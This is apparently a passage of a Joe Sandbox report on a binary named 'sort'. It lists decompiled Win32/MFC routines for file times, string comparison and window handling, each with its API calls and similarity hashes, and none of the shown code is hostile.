                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Text$AlignCurrentH_prologPosition
                                            • String ID:
                                            • API String ID: 2331262098-0
                                            • Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
                                            • Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
                                            • Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
                                            • Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004181F2(void* __ecx, char _a4) {
                                            				struct _FILETIME _v12;
                                            				struct _FILETIME _v20;
                                            				struct _FILETIME _v28;
                                            				void* _t29;
                                            				void* _t30;
                                            				long _t33;
                                            				long _t34;
                                            				intOrPtr _t43;
                                            				signed int _t45;
                                            				signed int _t46;
                                            				void* _t54;
                                            				CHAR* _t55;
                                            				intOrPtr* _t56;
                                            
                                            				_t56 = _a4;
                                            				_t54 = __ecx;
                                            				E00406330(_t56, 0, 0x118);
                                            				_t2 = _t56 + 0x12; // 0x4181ee
                                            				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
                                            				_t29 =  *(_t54 + 4);
                                            				_t46 = _t45 | 0xffffffff;
                                            				if(_t29 == _t46) {
                                            					L12:
                                            					_t30 = 1;
                                            					return _t30;
                                            				}
                                            				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				_t33 = GetFileSize( *(_t54 + 4), 0);
                                            				 *(_t56 + 0xc) = _t33;
                                            				if(_t33 != _t46) {
                                            					_t55 =  *(_t54 + 0xc);
                                            					if( *((intOrPtr*)(_t55 - 8)) != 0) {
                                            						_t34 = GetFileAttributesA(_t55);
                                            						if(_t34 == _t46) {
                                            							goto L5;
                                            						}
                                            						 *(_t56 + 0x10) = _t34;
                                            						L8:
                                            						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
                                            						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
                                            						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
                                            						 *((intOrPtr*)(_t56 + 4)) = _t43;
                                            						if( *_t56 == 0) {
                                            							 *_t56 = _t43;
                                            						}
                                            						if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                            							_t24 = _t56 + 4; // 0xfffef685
                                            							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
                                            						}
                                            						goto L12;
                                            					}
                                            					L5:
                                            					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
                                            					goto L8;
                                            				}
                                            				goto L3;
                                            			}

                                            APIs
                                            • lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
                                            • GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: File$AttributesSizeTimelstrcpyn
                                            • String ID:
                                            • API String ID: 1499663573-0
                                            • Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
                                            • Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
                                            • Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
                                            • Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E00421DA3() {
                                            				intOrPtr _t25;
                                            				struct HWND__* _t26;
                                            				struct HWND__* _t43;
                                            				struct HWND__** _t50;
                                            				void* _t52;
                                            
                                            				E00406520(E0042A3D8, _t52);
                                            				_t25 =  *0x436980; // 0x436994
                                            				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
                                            				_t50 =  *(_t52 + 0xc);
                                            				_t26 = _t50[2];
                                            				_t43 = _t50[1];
                                            				 *(_t52 - 4) = 0;
                                            				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
                                            					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
                                            						goto L4;
                                            					}
                                            				} else {
                                            					L4:
                                            					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
                                            				}
                                            				if(_t43 == 0) {
                                            					L8:
                                            					_push(0x50);
                                            					_push( *((intOrPtr*)(_t52 - 0x10)));
                                            					_push( &(_t50[4]));
                                            					if(_t50[2] != 0xfffffdf8) {
                                            						E00416D78();
                                            					} else {
                                            						lstrcpynA();
                                            					}
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
                                            					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
                                            					_push(1);
                                            					_pop(0);
                                            				} else {
                                            					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
                                            						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
                                            						goto L8;
                                            					}
                                            				}
                                            				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
                                            				E00416AEC(_t52 - 0x10);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                                            				return 0;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00421DA8
                                            • GetDlgCtrlID.USER32 ref: 00421DEC
                                            • lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CtrlH_prologWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 2888839504-0
                                            • Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
                                            • Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
                                            • Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
                                            • Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E0040BF2C(void* __ecx) {
                                            				int _t30;
                                            				void* _t40;
                                            				int _t42;
                                            				short* _t44;
                                            				int _t45;
                                            				int _t48;
                                            				void* _t49;
                                            				short* _t51;
                                            
                                            				_t40 = __ecx;
                                            				_t51 =  *(_t49 - 0x18);
                                            				 *(_t49 - 0x24) = 0;
                                            				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                                            				_t45 =  *(_t49 + 0x14);
                                            				_t42 = 1;
                                            				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
                                            					L8:
                                            					_t30 = 0;
                                            				} else {
                                            					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
                                            					 *(_t49 - 0x20) = _t48;
                                            					if(_t48 == 0) {
                                            						goto L8;
                                            					} else {
                                            						 *(_t49 - 4) = _t42;
                                            						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
                                            						 *(_t49 - 0x18) = _t51;
                                            						_t44 = _t51;
                                            						 *(_t49 - 0x28) = _t44;
                                            						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                                            						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
                                            							goto L8;
                                            						} else {
                                            							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
                                            				return _t30;
                                            			}












                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
                                            • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$CompareString
                                            • String ID:
                                            • API String ID: 376665442-0
                                            • Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
                                            • Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
                                            • Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
                                            • Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
                                            				struct _FILETIME _v12;
                                            				struct _SYSTEMTIME _v28;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t30;
                                            				int _t36;
                                            				void* _t50;
                                            
                                            				_t47 = _a4;
                                            				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
                                            				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
                                            				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
                                            				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
                                            				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
                                            				_t30 = E00410A6D(_t47, 0, 0);
                                            				_v28.wMilliseconds = 0;
                                            				_v28.wSecond =  *_t30;
                                            				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
                                            					E00417D15(_t50, GetLastError(), 0);
                                            				}
                                            				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
                                            				if(_t36 == 0) {
                                            					return E00417D15(_t50, GetLastError(), 0);
                                            				}
                                            				return _t36;
                                            			}












                                            APIs
                                            • SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
                                            • GetLastError.KERNEL32(00000000), ref: 0041840B
                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
                                            • GetLastError.KERNEL32(00000000), ref: 00418425
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Time$File$ErrorLast$LocalSystem
                                            • String ID:
                                            • API String ID: 1172841412-0
                                            • Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
                                            • Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
                                            • Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
                                            • Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00427D03(void* __ecx) {
                                            				CHAR* _t35;
                                            				void* _t40;
                                            				CHAR* _t49;
                                            				CHAR* _t55;
                                            				signed int _t56;
                                            				void* _t61;
                                            
                                            				E00406520(E0042A190, _t61);
                                            				_t49 =  *(_t61 + 8);
                                            				_t55 =  *(_t61 + 0xc);
                                            				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
                                            				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
                                            				_t56 = 0 | _t55 != 0x00000001;
                                            				_t35 =  *0x436980; // 0x436994
                                            				 *(_t61 + 8) = _t35;
                                            				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
                                            				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
                                            					if(_t56 != 0) {
                                            						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
                                            					} else {
                                            						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
                                            					}
                                            					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
                                            				}
                                            				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
                                            				_t40 = E00416AEC(_t61 + 8);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
                                            				return _t40;
                                            			}










                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00427D08
                                              • Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303
                                            • wsprintfA.USER32 ref: 00427D69
                                            • wsprintfA.USER32 ref: 00427D7F
                                            • SendMessageA.USER32(?,00000362,00000000,?), ref: 00427D99
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: wsprintf$H_prologMessageSendlstrlen
                                            • String ID:
                                            • API String ID: 443212507-0
                                            • Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
                                            • Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
                                            • Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
                                            • Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                            				int _v8;
                                            				int _t21;
                                            				intOrPtr _t32;
                                            				int _t36;
                                            				void* _t46;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t46 = __ecx;
                                            				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                            				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                            				_v8 = _t21;
                                            				OffsetRect(__ecx + 0x28, _t36, _t21);
                                            				OffsetRect(_t46 + 0x48, _t36, _v8);
                                            				OffsetRect(_t46 + 0x38, _t36, _v8);
                                            				OffsetRect(_t46 + 0x58, _t36, _v8);
                                            				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                                            				 *((intOrPtr*)(_t46 + 4)) = _a4;
                                            				 *((intOrPtr*)(_t46 + 8)) = _a8;
                                            				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                                            					_t32 = E004201E2();
                                            				} else {
                                            					_t32 = 0;
                                            				}
                                            				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                                            				return E0042007A(_t46, _t48, 0);
                                            			}









                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: OffsetRect
                                            • String ID:
                                            • API String ID: 177026234-0
                                            • Opcode ID: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
                                            • Instruction ID: 12d90742d37334e6a7f33d2c848e5a22a1ecdf716f2821100b5f1ee929164941
                                            • Opcode Fuzzy Hash: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
                                            • Instruction Fuzzy Hash: 3C113C71600609AFDB20DFAAC984D9BBBECEF44344B00482EF54AC3650D674EE408B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00422C42(void* __ecx) {
                                            				void* __ebp;
                                            				void* _t6;
                                            				void* _t8;
                                            				void* _t27;
                                            				void* _t30;
                                            				void* _t32;
                                            
                                            				_t32 = __ecx;
                                            				_t6 = E004136A7(__ecx);
                                            				if(_t6 != 0) {
                                            					if((E00416528(_t32) & 0x00000001) != 0) {
                                            						_t27 = E00414CEF(_t32);
                                            						_t30 = E00413740(_t32, GetForegroundWindow());
                                            						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
                                            							_push(1);
                                            							_pop(0);
                                            						}
                                            						asm("sbb eax, eax");
                                            						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
                                            					}
                                            					_t8 = 1;
                                            					return _t8;
                                            				}
                                            				return _t6;
                                            			}










                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetForegroundWindow.USER32 ref: 00422C66
                                            • GetLastActivePopup.USER32(?), ref: 00422C81
                                            • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00422C9D
                                            • SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 00422CBE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ActiveForegroundLastLongPopup
                                            • String ID:
                                            • API String ID: 2039223353-0
                                            • Opcode ID: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
                                            • Instruction ID: 235acb9714286046b2b697988b516babaf9458fdd3923160d87edcd70ef93c92
                                            • Opcode Fuzzy Hash: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
                                            • Instruction Fuzzy Hash: 2301F2723403153EEB212A73FD51FAE6209AB40B55F50083ABA01DA2D1DAADDD86416C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00417748(void* __ecx, void* __esi) {
                                            				void* _v8;
                                            				void* __ebp;
                                            				void* _t10;
                                            				void* _t22;
                                            				intOrPtr* _t29;
                                            				void* _t31;
                                            				void* _t34;
                                            
                                            				_t31 = __esi;
                                            				_push(__ecx);
                                            				_t22 = __ecx;
                                            				if(E004131DD(0x10) == 0) {
                                            					_t29 = 0;
                                            				} else {
                                            					_t29 = E004176E1(_t8, 0xffffffff);
                                            				}
                                            				_push(_t31);
                                            				_t10 = GetCurrentProcess();
                                            				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
                                            					if(_t29 != 0) {
                                            						 *((intOrPtr*)( *_t29 + 4))(1);
                                            					}
                                            					E00417D15(_t34, GetLastError(), 0);
                                            				}
                                            				 *((intOrPtr*)(_t29 + 4)) = _v8;
                                            				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
                                            				return _t29;
                                            			}











                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
                                            • DuplicateHandle.KERNEL32(00000000), ref: 00417785
                                            • GetLastError.KERNEL32(00000000), ref: 0041779F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                            • String ID:
                                            • API String ID: 3907606552-0
                                            • Opcode ID: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
                                            • Instruction ID: 78f57001bf266bd8873ef29effcb20f5a2db12ccf0cf7036e4147b7dfe15a156
                                            • Opcode Fuzzy Hash: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
                                            • Instruction Fuzzy Hash: CC018435704304BBEB10ABA9DC49FAA7BB8DF44760F244526F915CB2D1DB64EC8087A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
                                            				struct tagPOINT _v12;
                                            				struct tagPOINT* _t8;
                                            				struct HWND__* _t9;
                                            				int _t14;
                                            				long _t18;
                                            				struct HWND__* _t21;
                                            				struct HWND__* _t22;
                                            				struct HWND__* _t24;
                                            
                                            				_t8 = _a8;
                                            				_v12.x = _t8->x;
                                            				_t18 = _t8->y;
                                            				_push(_t18);
                                            				_v12.y = _t18;
                                            				_t9 = WindowFromPoint( *_t8);
                                            				_t24 = _t9;
                                            				if(_t24 != 0) {
                                            					_t21 = GetParent(_t24);
                                            					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
                                            						ScreenToClient(_t24,  &_v12);
                                            						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
                                            						if(_t22 == 0) {
                                            							L6:
                                            							_t9 = _t24;
                                            						} else {
                                            							_t14 = IsWindowEnabled(_t22);
                                            							_t9 = _t22;
                                            							if(_t14 != 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            					} else {
                                            						_t9 = _t21;
                                            					}
                                            				}
                                            				return _t9;
                                            			}












                                            APIs
                                            • WindowFromPoint.USER32(?,?), ref: 00410C67
                                            • GetParent.USER32(00000000), ref: 00410C74
                                            • ScreenToClient.USER32 ref: 00410C95
                                            • IsWindowEnabled.USER32(00000000), ref: 00410CAE
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
                                            • String ID:
                                            • API String ID: 2204725058-0
                                            • Opcode ID: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
                                            • Instruction ID: b03e2d05c99e3754afe2f9c82b4a20bfc763fe38c38db5da76ce186bf725b679
                                            • Opcode Fuzzy Hash: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
                                            • Instruction Fuzzy Hash: 8D01D436600614BF87169B989C44DEF7BB9EF85740B140129F905D7310EB78DD818BEC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00426CBA(intOrPtr __ecx, void* __eflags) {
                                            				void* _t21;
                                            				intOrPtr* _t32;
                                            				struct HICON__** _t40;
                                            				intOrPtr _t43;
                                            				void* _t45;
                                            
                                            				E00406520(E0042A113, _t45);
                                            				_push(__ecx);
                                            				_t43 = __ecx;
                                            				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
                                            				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
                                            				 *(_t45 - 4) = 1;
                                            				E00419BEE(__ecx + 0x78);
                                            				_t39 =  *((intOrPtr*)(_t43 + 0x114));
                                            				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
                                            					E004288AC(_t39);
                                            					E00413206(_t39);
                                            				}
                                            				E00413206( *((intOrPtr*)(_t43 + 0x88)));
                                            				_t32 =  *((intOrPtr*)(_t43 + 0x74));
                                            				if(_t32 != 0) {
                                            					 *((intOrPtr*)( *_t32 + 4))(1);
                                            				}
                                            				_t40 = _t43 + 0x100;
                                            				if( *(_t43 + 0x100) != 0) {
                                            					SetCursor(LoadCursorA(0, 0x7f00));
